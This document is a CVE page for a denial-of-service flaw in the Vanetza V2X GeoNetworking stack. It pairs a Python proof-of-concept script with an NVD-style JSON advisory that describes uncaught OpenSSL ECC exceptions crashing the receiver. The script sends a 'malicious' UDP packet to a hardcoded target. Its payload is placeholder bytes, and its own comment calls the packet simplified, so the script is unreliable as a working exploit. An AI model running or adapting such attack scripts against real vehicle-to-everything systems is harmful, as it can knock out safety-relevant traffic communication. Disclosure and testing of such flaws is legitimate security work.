CVE-2026-37554

#!/usr/bin/env python3 # PoC for CVE-2026-37554: Vanetza GeoNetworking DoS # This script sends a crafted GeoNetworking packet with an invalid ECC point to trigger the crash. import socket import struct # Target IP and Port (假设Vanetza监听的默认端口) TARGET_IP = "192.168.1.100" TARGET_PORT = 12345 def create_malicious_packet(): # Basic GeoNetworking header structure (simplified for PoC) # This packet includes a crafted SecuredMessage section with an invalid ECC point. header = b'\x01' * 20 # Placeholder for GeoNetworking basic header # Simulate a malformed Secured Message payload that triggers OpenSSL Exception # Specifically targeting the ECC point validation logic malformed_payload = b'\x02' * 10 + b'\xFF' * 32 # Invalid compressed point pattern return header + malformed_payload def main(): print(f"[*] Sending PoC payload to {TARGET_IP}:{TARGET_PORT}...") try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) payload = create_malicious_packet() sock.sendto(payload, (TARGET_IP, TARGET_PORT)) print("[+] Payload sent successfully. Check if the target crashed.") except Exception as e: print(f"[-] Error: {e}") finally: sock.close() if __name__ == "__main__": main()

{"cve": {"id": "CVE-2026-37554", "sourceIdentifier": "[email protected]", "published": "2026-05-01T16:16:31.060", "lastModified": "2026-05-07T19:16:00.547", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Vanetza V2X v26.02 allowing remote unauthorized attackers to cause a denial of service. The vulnerability exists in the GeoNetworking packet processing pipeline where OpenSSL exceptions from ECC point validation (invalid compressed point, point not on curve) are not properly caught by the Router::indicate() call chain. The openssl_wrapper.cpp check() function (line 19) throws openssl::Exception when OpenSSL operations fail. The parser's catch block in parse_secured() should catch these, but the exception escapes through subsequent processing stages (indicate_common, indicate_extended). This causes std::terminate, crashing the V2X receiver."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-248"}]}], "references": [{"url": "https://gist.github.com/sgInnora/45128ae15d52df7238680a8f2da8359f", "source": "[email protected]"}, {"url": "https://github.com/riebl/vanetza", "source": "[email protected]"}, {"url": "https://github.com/riebl/vanetza/blob/master/vanetza/geonet/router.cpp", "source": "[email protected]"}, {"url": "https://github.com/riebl/vanetza/blob/master/vanetza/security/openssl_wrapper.cpp", "source": "[email protected]"}, {"url": "https://github.com/riebl/vanetza/security/advisories/GHSA-44qj-vh8c-5354", "source": "[email protected]"}]}}